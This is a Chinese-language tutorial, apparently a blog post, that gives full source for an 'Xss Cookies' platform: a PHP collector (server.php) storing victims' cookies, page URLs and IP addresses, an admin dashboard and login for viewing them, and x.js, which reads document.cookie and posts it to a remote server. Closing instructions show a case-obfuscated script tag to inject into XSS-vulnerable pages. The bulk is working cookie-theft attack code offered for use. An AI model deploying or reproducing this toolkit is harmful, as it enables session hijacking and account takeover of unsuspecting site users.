首先建立css文件夹-并改文件名为:bootstrap.min.css

Css源代码:

项目链接地址:https://github.com/truda8/xss-cookies/

第二步:建立文件夹install/内放index.php

源代码:

请前往项目链接地址下载和学习

建立php文件:config.php

源代码:

<?php
// Mysql database config
$host = "localhost";
$user = "xss";
$pass = "123456";
$dbname = "xss";

// Admin username and password
$admin_user = "admin";
$admin_pass = "123456";

// 服务端地址
$server_url = "http://127.0.0.1/server.php";

// Create connection
$conn = new mysqli($host, $user, $pass, $dbname);

// Check connection
if ($conn->connect_error) {
  die("Connection failed: " . $conn->connect_error);
}
?>

建立index.php文件

源代码:

<?php
  include("./config.php");
  session_start();
  //  判断是否登陆
  if (!isset($_SESSION["admin"]) or $_SESSION["admin"] !== true) {
    //  验证失败
    $_SESSION["admin"] = false;
    header("Location: " . "./login.php");
    die();
  }
?>
<!DOCTYPE html>
<html lang="zh-CN">
    <head>
        <meta charset="UTF-8" />
        <meta http-equiv="X-UA-Compatible" content="IE=edge" />
        <meta name="viewport" content="width=device-width, initial-scale=1.0" />
        <title>Xss Cookies</title>
        <link rel="stylesheet" href="css/bootstrap.min.css">
        <style>
          td:nth-child(2) {
            max-width: 180px;
          }
          td:nth-child(3) {
            max-width: 360px;
          }
        </style>
    </head>
    <body class="bg-dark">
        <div class="container">
          <div class="card text-white bg-success text-center m-3 p-3">
            <h3 class="card-header bg-success">🍪Xss Cookies</h3>
            <div class="card-body table-responsive">
              <table class="table table-hover text-white">
                <thead>
                  <tr>
                    <th scope="col">Id</th>
                    <th scope="col-2">Url</th>
                    <th scope="col">Cookies</th>
                    <th scope="col">Client ip</th>
                    <th scope="col">Add date</th>
                  </tr>
                </thead>
                <tbody>
                  <script>
                    Notiflix.Loading.Hourglass('Loading...');
                  </script>
                  <?php
                    function p($value) {
                      return htmlspecialchars($value, ENT_QUOTES, 'UTF-8', false);
                    }

                    $sql = "SELECT id, target_url, cookies, client_ip, add_date FROM cookies;";
                    $result = $conn->query($sql);
                    if ($result->num_rows > 0) {
                        // echo data
                        while ($row = $result->fetch_assoc()) {
                            echo '<tr>';
                            echo '<td scope="row">' . p($row["id"]) . '</td>';
                            echo '<td><a class="link-info" href="' . p($row["target_url"]) . '" target="_blank">' . p($row["target_url"]) . '</a></td>';
                            echo '<td scope="row">' . p($row["cookies"]) . '</td>';
                            echo '<td scope="row">' . p($row["client_ip"]) . '</td>';
                            echo '<td scope="row">' . p($row["add_date"]) . '</td>';
                            echo '</tr>';
                        }
                    }
                  ?>
                  <script>
                    Notiflix.Loading.Remove();
                  </script>
                </tbody>
              </table>
            </div>
            <div class="card-footer bg-success text-gray-600">
              In the end.
            </div>
          </div>
        </div>
    </body>
</html>

建立登录php文件:/login.php

源代码:

<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Login - Xss Cookies</title>
    <link rel="stylesheet" href="css/bootstrap.min.css">
    <style>
        html,body {
            margin: 0;
            padding: 0;
            height: 100vh;
        }

        .container {
            height: 100vh;
        }

        .row {
            height: 100vh;
        }

    </style>
    <script src="js/notiflix-aio-2.7.0.min.js"></script>

</head>
<body class="bg-dark">
    <div class="container">
        <div class="row align-items-center justify-content-md-center">
            <div class="col-sm-12 col-lg-6">
                <h3 class="text-light">Xss Cookies 登录</h3>
                <form class="text-light" method="POST" action="./login.php">
                    <div class="mb-3">
                        <label for="username" class="form-label">用户名</label>
                        <input type="text" class="form-control" id="username" name="username">
                    </div>
                    <div class="mb-3">
                        <label for="password" class="form-label">密码</label>
                        <input type="password" class="form-control" id="password" name="password">
                    </div>
                    <div class="mb-3">
                        <input type="checkbox" class="form-check-input" id="Check">
                        <label class="form-check-label" for="Check">记住密码</label>
                    </div>
                    <button type="submit" class="btn btn-primary">立即登录</button>
                </form>
            </div>
        </div>
    </div>
    <script>
        Notiflix.Report.Init({
            messageFontSize:'18px',
        });
        <?php
            if ($_SERVER["REQUEST_METHOD"] == "POST") {
                include("./config.php");
                session_start();
                $username = $_POST["username"];
                $password = $_POST["password"];
                if ($username === $admin_user && $password === $admin_pass) {
                    $_SESSION["admin"] = true;
                    $success = "
                    Notiflix.Report.Success('登录成功',
                        '即将跳转到管理页面...',
                        '立即跳转',
                        function(){
                            window.location.href = './index.php';
                        });
                        setTimeout(function(){
                            window.location.href = './index.php';
                        },3000);
                    ";
                    echo $success;
                } else {
                    $error = "Notiflix.Report.Failure('登录失败',
                                '账号或密码错误!',
                                '确定');
                    ";
                    echo $error;
                }
            }
        ?>
    </script>
</body>
</html>
Footer

建立客户端php文件:server.php

源代码:

<?php
include('./config.php');

// 允许所有域名访问,解决Ajax跨站问题
header('Access-Control-Allow-Origin:*');

// 获取客户端IP
function get_client_ip() {
    $ip = null;
    if (isset($_SERVER["REMOTE_ADDR"])) {
        $ip = $_SERVER["REMOTE_ADDR"];
    } else if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
        $ip = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
        $ip = trim(current($ip));
    } else if (isset($_SERVER["HTTP_X_REAL_IP"])) {
        $ip = $_SERVER["HTTP_X_REAL_IP"];
    }
    return $ip;
}

// Get client data
$url = $_POST['url'];
$cookies = $_POST['cookies'];
$client_ip = get_client_ip();

// Save data
if ($url && $cookies && $client_ip) {
    // 预编译
    $add_client = $conn->prepare("INSERT INTO cookies (target_url, cookies, client_ip) VALUES (?, ?, ?)");
    $add_client->bind_param("sss", $url, $cookies, $client_ip);

    $add_client->execute();
    $add_client->close();
}

echo 1;
$conn->close();

建立cookie js 获取文件:x.js

源代码:

let allCookies = document.cookie;
let sererUrl = "http://192.168.3.60/server.php";
let currentUrl = window.location.href;

function sendCookie() {
    const xhttp = new XMLHttpRequest();
    xhttp.open("POST", sererUrl, true);
    xhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    let data = "cookies=" + allCookies + "&url=" + currentUrl;
    xhttp.send(data);
}

if (allCookies && currentUrl) {
    // Url encode
    allCookies = encodeURIComponent(allCookies);
    currentUrl = encodeURIComponent(currentUrl);
    sendCookie();
}

食用方法和安装:
修改配置文件 config.php 修改以下信息
MySQL 数据库信息
管理员账号密码
服务端地址

  1. 当前目录所有文件部署到 php web server
  2. 打开 http://域名/install/ 进行安装
    二、使用
  3. 将如下代码植入怀疑出现 xss 的地方
    <sCRiPt sRC=http://域名/x.js></sCrIpT>
  4. 打开 http://域名/ 登录查看 cookies 信息
    点我进入项目链接地址